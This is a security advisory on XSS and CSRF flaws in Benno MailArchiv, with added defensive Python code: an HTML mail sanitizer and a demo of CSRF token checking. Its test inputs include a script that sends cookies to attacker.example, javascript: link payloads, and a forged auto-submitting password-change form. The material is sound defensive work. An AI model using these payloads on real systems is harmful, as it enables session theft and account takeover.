In mid-July 2023, two critical security vulnerabilities were discovered in Benno MailArchiv.
One is a critical XSS vulnerability (Cross-Site Scripting), the other a critical XSRF vulnerability (Cross-Site Request Forgery).

CVE numbers were assigned for the two security vulnerabilities:

  • CVE-2023-38347 (for the XSS vulnerability)
  • CVE-2023-38348 (for the XSRF vulnerability)

Solution:

Please update your Benno MailArchiv installation promptly to the latest version. Installing the packages benno-web (version 2.10.2) and benno-rest (version 2.10.1) updates the two affected components and closes both critical security vulnerabilities.

Important note on the update:

The update enforces HTTPS (TLS-encrypted HTTP) for the WebApp directly from installation.
After the update, login to the Benno WebApp is only possible via HTTPS.

Login over plain HTTP (unencrypted) is still possible, but it must be enabled explicitly. This article in the Benno Wiki explains how to enable plaintext HTTP login: https://wiki.benno-mailarchiv.de/doku.php/http_plaintext_access

WARNING – IMPORTANT:
The XSS fix is only fully effective when the WebApp is used over HTTPS: it relies in part on the session cookie being marked Secure, and a browser transmits a Secure cookie only over HTTPS.
If the installation is manually switched to plaintext HTTP login as described, the XSS vulnerability remains exploitable and the server is again exposed to the security flaw.

Further information on the two critical security vulnerabilities:

Regarding CVE-2023-38347 (XSS vulnerability):
The Benno WebApp displays e-mails in the web interface unfiltered. Before HTML content is rendered, it is neither inspected for malicious JavaScript code etc. nor is such code filtered out.
If an archived mail contains deliberately crafted, malicious JavaScript code and a user opens that mail in the Benno WebApp, the JavaScript executes in the user's browser, can read the session cookie and transmit it to the attacker. An attacker could thereby take over the session of the affected user and gain access to the mail archive (as far as it is reachable via the Internet). Via the same route it would also be possible to change the password of the logged-in Benno WebApp user. (This attack vector is limited in time to the lifetime of the session cookie: closing the victim's web browser discards the cookie. Note that a cookie that has already been exfiltrated remains usable by the attacker until the server-side session expires or the user logs out.)
With the updated versions of benno-web and benno-rest this XSS vulnerability is closed. Before HTML-formatted mails are displayed, benno-rest now removes JavaScript code from them. In the benno-web package, cookie handling was changed so that the session cookie is set with HttpOnly (it can no longer be read from JavaScript) and Secure (it is only sent over HTTPS). In addition, a CSRF token was added to the forms in benno-web, so the web server can now determine whether a form submission was sent by a legitimate user via that user's browser or not.
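The following is an added illustration of the server-side filtering step described above, written for this page; it is not code from benno-rest and does not claim to reproduce Benno's filtering rules. It assumes an allow-list policy (the tag, attribute and URL-scheme sets below are assumptions for the example) and shows why removing `<script>` alone is not enough: event-handler attributes, `javascript:` URLs with whitespace obfuscation, and embedded frames are all stripped, and text is re-encoded so decoded entities cannot turn back into markup.

```python
import re
from html import escape
from html.parser import HTMLParser

# Allow-list policy (an assumption for this example, not Benno's actual rules):
# anything not listed here is dropped before the mail is rendered.
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "em", "strong", "a", "ul", "ol", "li", "div",
                "span", "table", "tr", "td", "th", "blockquote", "pre", "img"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt", "width", "height"},
                 "td": {"colspan", "rowspan"}, "th": {"colspan", "rowspan"}}
# These elements are removed together with everything inside them.
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed", "noscript", "template"}
VOID_TAGS = {"br", "img"}
# URL schemes a mail body may reference; javascript:, data:, vbscript: never match.
SAFE_URL = re.compile(r"^(https?:|mailto:|cid:)", re.IGNORECASE)
# Browsers ignore ASCII whitespace/control characters when parsing a scheme, so
# "java\nscript:" must be checked after stripping them.
URL_NOISE = re.compile(r"[\x00-\x20]")


class MailSanitizer(HTMLParser):
    """Re-emits only allow-listed tags/attributes; script content is never copied out."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0      # > 0 while inside a DROP_WITH_CONTENT element
        self.open_tags = []      # stack used to keep the output well-formed

    def handle_starttag(self, tag, attrs):
        if self.skip_depth:
            if tag in DROP_WITH_CONTENT:
                self.skip_depth += 1
            return
        if tag in DROP_WITH_CONTENT:
            self.skip_depth = 1
            return
        if tag not in ALLOWED_TAGS:
            return                      # unknown element: drop the tag, keep its text
        kept = []
        for name, value in attrs:
            name = name.lower()
            value = value or ""
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue                # drops every on* handler, style, srcdoc, ...
            if name in ("href", "src") and not SAFE_URL.match(URL_NOISE.sub("", value)):
                continue                # refuse javascript:/data: and obfuscated variants
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if self.skip_depth:
            if tag in DROP_WITH_CONTENT:
                self.skip_depth -= 1
            return
        if tag in VOID_TAGS or tag not in ALLOWED_TAGS or tag not in self.open_tags:
            return
        while self.open_tags:           # close anything left open inside this element
            inner = self.open_tags.pop()
            self.out.append(f"</{inner}>")
            if inner == tag:
                break

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))   # re-encode text, never emit raw

    # Comments, declarations and processing instructions are dropped because
    # HTMLParser's default handlers for them do nothing.

    def close(self):
        super().close()
        while self.open_tags:
            self.out.append(f"</{self.open_tags.pop()}>")


def sanitize_mail_html(body: str) -> str:
    s = MailSanitizer()
    s.feed(body)
    s.close()
    return "".join(s.out)


# Constructed sample: an archived mail carrying the cookie-stealing payload the advisory describes.
MALICIOUS_MAIL = (
    "<p>Invoice attached.</p>"
    '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
    '<img src="https://example.test/logo.png" onerror="alert(document.cookie)">'
    '<a href="javascript:alert(1)">click</a>'
    '<a href="  JaVaScRiPt:alert(2)">click</a>'
    '<iframe src="https://attacker.example/phish"><b>nested</b></iframe>'
    '<div style="background:url(javascript:alert(3))">styled</div>'
)

if __name__ == "__main__":
    print(sanitize_mail_html(MALICIOUS_MAIL))
```

Running it prints the surviving markup only: the paragraph, the image without its `onerror`, two bare links, and the `div` without its `style`. Note that this filtering alone does not depend on HTTPS; it is the Secure cookie flag, discussed above, that does.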

Regarding CVE-2023-38348 (XSRF vulnerability):
Through the XSRF vulnerability, an administrator can, for example, be lured via a link to a prepared page that silently submits a request to the Benno WebApp in the administrator's name. Because the browser attaches the administrator's session cookie to that request, the WebApp processes it as if the administrator had made it. In this way an attacker can change the administrator's password or other settings to values of the attacker's choosing and thereby obtain access to the archive. (The attacker does not need to intercept traffic; the forged request originates from the victim's own browser.)
In the benno-web package, CSRF tokens have now been introduced. When a user logs in, benno-web creates such a token, stores it in the session, and lets it expire at the end of the session. benno-web adds the token as a hidden field to every web form that changes data when submitted (e.g. change password, adjust user, etc.). When an administrator submits a change, the token is sent along and checked against the one issued for the session; a submission whose token is missing or does not match is rejected. A page on another origin cannot read the token, so forged submissions of this kind are effectively prevented.
With the updated versions of benno-web and benno-rest, this security vulnerability is closed.
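The following is an added, self-contained illustration of the two server-side measures described on this page, the hardened session cookie (see the warning about HTTPS above) and the per-session CSRF token; it is written for this page and is not code from benno-web. The cookie name, field name and URL are hypothetical, and the `SameSite=Lax` attribute is an extra defence the advisory does not mention. It shows why the token check defeats a forged cross-site form, and why the Secure flag is what ties the cookie protection to HTTPS.

```python
import hmac
import re
import secrets

# Hypothetical names for this example; Benno's real cookie and field names may differ.
SESSION_COOKIE = "BENNOSESSID"
CSRF_FIELD = "csrf_token"


def session_cookie_header(session_id: str, https: bool) -> str:
    """Set-Cookie line for the session cookie.

    HttpOnly: document.cookie (the XSS exfiltration path) cannot read it.
    Secure:   the browser only sends it over HTTPS. This is the attribute that
              ties the fix to HTTPS: a deployment reopened for plain-HTTP login
              cannot use Secure, so that protection is lost there.
    SameSite: not mentioned in the advisory; added here as defence in depth.
    """
    attrs = [f"{SESSION_COOKIE}={session_id}", "Path=/", "HttpOnly", "SameSite=Lax"]
    if https:
        attrs.append("Secure")
    return "Set-Cookie: " + "; ".join(attrs)


class Session:
    def __init__(self, user: str):
        self.id = secrets.token_urlsafe(32)
        self.user = user
        # Created once at login; lives exactly as long as the session.
        self.csrf_token = secrets.token_urlsafe(32)


SESSIONS: dict[str, Session] = {}
PASSWORDS: dict[str, str] = {"admin": "initial-secret"}   # constructed sample data


def login(user: str) -> Session:
    s = Session(user)
    SESSIONS[s.id] = s
    return s


def render_change_password_form(session: Session) -> str:
    # The per-session token goes into every state-changing form as a hidden field.
    return (
        '<form method="post" action="/user/password">'
        f'<input type="hidden" name="{CSRF_FIELD}" value="{session.csrf_token}">'
        '<input type="password" name="new_password"><button>Save</button></form>'
    )


def browser_submits(form_html: str, new_password: str) -> dict:
    """What a browser posts when the user submits the given form (hidden fields included)."""
    m = re.search(rf'name="{CSRF_FIELD}" value="([^"]+)"', form_html)
    return {CSRF_FIELD: m.group(1) if m else "", "new_password": new_password}


def handle_change_password(cookies: dict, form: dict) -> tuple[int, str]:
    """Server side: the session comes from the cookie, the token must match that session."""
    session = SESSIONS.get(cookies.get(SESSION_COOKIE, ""))
    if session is None:
        return 401, "no valid session"
    submitted = form.get(CSRF_FIELD, "")
    # Constant-time comparison; bytes so a non-ASCII submission cannot raise.
    if not hmac.compare_digest(submitted.encode(), session.csrf_token.encode()):
        return 403, "CSRF token missing or invalid"
    PASSWORDS[session.user] = form.get("new_password", "")
    return 200, "password changed"


# Constructed attacker page: it knows the form's field names but, because of the
# same-origin policy, cannot read the token held in the victim's session.
FORGED_PAGE = (
    '<form method="post" action="https://archive.example/user/password" id="f">'
    '<input type="hidden" name="new_password" value="attacker-chosen">'
    '</form><script>document.getElementById("f").submit()</script>'
)


def demo() -> tuple[int, int, int]:
    admin = login("admin")
    cookies = {SESSION_COOKIE: admin.id}          # the browser attaches this automatically
    ok, _ = handle_change_password(cookies, browser_submits(render_change_password_form(admin), "new-pw"))
    forged, _ = handle_change_password(cookies, browser_submits(FORGED_PAGE, "attacker-chosen"))
    # An attacker with their own account cannot reuse their token against the admin's session.
    attacker = login("mallory")
    cross, _ = handle_change_password(cookies, {CSRF_FIELD: attacker.csrf_token, "new_password": "x"})
    return ok, forged, cross


if __name__ == "__main__":
    print(session_cookie_header("abc123", https=True))
    print(demo())
```

`demo()` returns `(200, 403, 403)`: the legitimate submission carries the token from the rendered form and succeeds, the forged page's submission is rejected because it has no token, and a token from a different session is rejected because the check is bound to the session identified by the cookie.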